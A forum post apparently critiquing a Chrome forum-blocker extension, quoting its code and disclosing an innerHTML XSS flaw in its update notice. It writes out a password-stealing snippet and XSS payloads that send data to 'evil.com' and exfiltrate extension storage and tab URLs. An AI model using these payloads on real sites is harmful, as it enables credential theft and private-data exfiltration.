Hi Everyone,
Here's what everyone, including you too Pheer, should know:
MAJOR RED FLAGS
1. Dangerous Permission Scope: <all_urls>
This is the biggest concern. The content script runs on EVERY webpage you visit, not just vBulletin forums. This can include banking sites, web-based email, shopping carts, etc. Everything.
What it does on EVERY page:
// Line 8-10: Tracks ALL right-clicks on ALL websites
document.addEventListener("contextmenu", (e) => {
lastRightClickedElement = e.target;
});
// Line 568: Runs on page load for EVERY site
init();
// Line 427-443: Watches ALL DOM changes on ALL pages
MutationObserver monitors entire page constantly
Why this is dangerous:
- The extension has full access to read/modify any page content including:
- Passwords as you type them
- Credit card numbers
- Private messages
- Session cookies (via document.cookie if added)
- Banking information
- Currently the code doesn't exploit this, but one update could change everything
2. Remote Update Mechanism = Backdoor Potential
// popup.js:247
fetch('https://webigniter.com/downloads/tango-down-version.txt?t=' + Date.now())
The extension phones home to check for updates. Chrome Web Store extensions auto-update. This means:
- Author can push a malicious update anytime
- Update could add credential harvesting with 2 lines of code
- Update could send all your browsing data to a server
- You'd never know until it's too late
3. "GFY Community" Targeting
The extension explicitly states "Built for the GFY community" (popup.html:287). This is a tight-knit community as we all know of course, but if we ran it, then Pheer would know exactly who the users are, make targeted attacks easier, etc.
SPECIFIC ATTACK SCENARIOS
Here is what Pheer could do via an added update.
Scenario 1: Credential Theft
// Add to content.js (2 lines)
document.querySelectorAll('input[type="password"]').forEach(input => {
input.addEventListener('change', (e) => fetch('https://evil.com/log', {
method: 'POST', body: JSON.stringify({site: location.href, pass: e.target.value})
}));
});
Scenario 2: Forum Post Surveillance
Since it targets vBulletin forums, author could:
- Log all posts you write before submitting
- Track who you interact with
- Monitor private messages (if forums have PM features)
- Build a profile of your forum behavior
Scenario 3: Browser Fingerprinting & Tracking
The version check (popup.js:247) already connects to webigniter.com. Easy to expand:
// Send browsing profile
fetch('https://webigniter.com/track', {
method: 'POST',
body: JSON.stringify({
sites: getAllTabURLs(),
blockedUsers: getUserBlocklist(),
identity: getChromeUser()
})
});
TRUST ISSUES IN THE CODE
Why does a forum blocker need:
- Access to all URLs instead of just *://*showthread.php* or *://*forumdisplay.php*?
- The tabs permission (can see all your open tabs)?
- To track right-clicks on non-forum sites?
Answer: It doesn't. This is basic 101 permission creep by asking for more than needed.
Pheer: If you want to be trusted coder, you should really look at the following. For example, this real identified a REAL XSS vulnerability. Let me prove it with technical analysis.
THE VULNERABILITY (Lines 270-278)
function showUpdateNotice(newVersion) {
const notice = document.createElement('div');
notice.className = 'update-notice';
notice.innerHTML = ` // ← DANGEROUS!
<span>Update available: v${newVersion}</span> // ← UNSANITIZED!
<a href="https://webigniter.com/tango-down" target="_blank">Download</a>
`;
document.body.insertBefore(notice, document.body.firstChild);
}
The Attack Vector:
The newVersion variable comes from a remote server (line 247-249):
fetch('https://webigniter.com/downloads/tango-down-version.txt?t=' + Date.now())
.then(response => response.text())
.then(latestVersion => {
latestVersion = latestVersion.trim(); // ← Only trims whitespace!
if (latestVersion && compareVersions(latestVersion, currentVersion) > 0) {
showUpdateNotice(latestVersion); // ← Passes to innerHTML!
}
})
PROOF OF CONCEPT EXPLOIT
If you Mindi/Pheer changes tango-down-version.txt to contain:
1.9.9</span><img src=x onerror="fetch('https://evil.com/steal',{method:'POST',body:JSON.stringify(chrome.s torage.sync.get(['blockedUsers']))})">
What happens:
1. Extension fetches this string from webigniter.com
2. trim() does nothing (doesn't sanitize HTML)
3. String is inserted into innerHTML
4. Browser parses it as HTML
5. The <img> tag's onerror executes JavaScript
6. JavaScript runs with full extension privileges
The resulting HTML:
<div class="update-notice">
<span>Update available: v1.9.9</span>
<img src=x onerror="fetch('https://evil.com/steal',{method:'POST',body:JSON.stringify(chrome.s torage.sync.get(['blockedUsers']))})">
<a href="https://webigniter.com/tango-down" target="_blank">Download</a>
</div>
Then the injected code executes immediately.
Earlier you said "Zero data is sent FROM your browser TO my server. Ever."
True now, but false tomorrow. Currently, no data is exfiltrated. But with one server-side change, you MindiPheer can inject:
// In version.txt:
1.9.9<script>
chrome.storage.sync.get(null, data => {
fetch('https://webigniter.com/log', {
method: 'POST',
body: JSON.stringify({
blockedUsers: data.blockedUsers,
blockedThreads: data.blockedThreads,
tabs: chrome.tabs.query({}, tabs => tabs.map(t => t.url))
})
});
});
</script>
This would exfiltrate:
- Your complete block list (reveals who you dislike)
- All blocked threads (shows what topics you want hidden)
- All open tab URLs (full browsing history)
You said:
Quote:
Originally Posted by Mindi
Every Chrome extension is a "backdoor" because developers could push malicious updates
|
FALSE EQUIVALENCE
Chrome Web Store updates:
- Go through automated security scanning
- Are reviewed by Google
- Have a rollback mechanism
- Users get security warnings
- Require new permissions approval
MindiPheer's version checker:
- Bypasses all Chrome protections
- No review process
- Instant injection
- Silent execution
- No permission prompts
This is WHY Chrome's Content Security Policy specifically tries to prevent this pattern.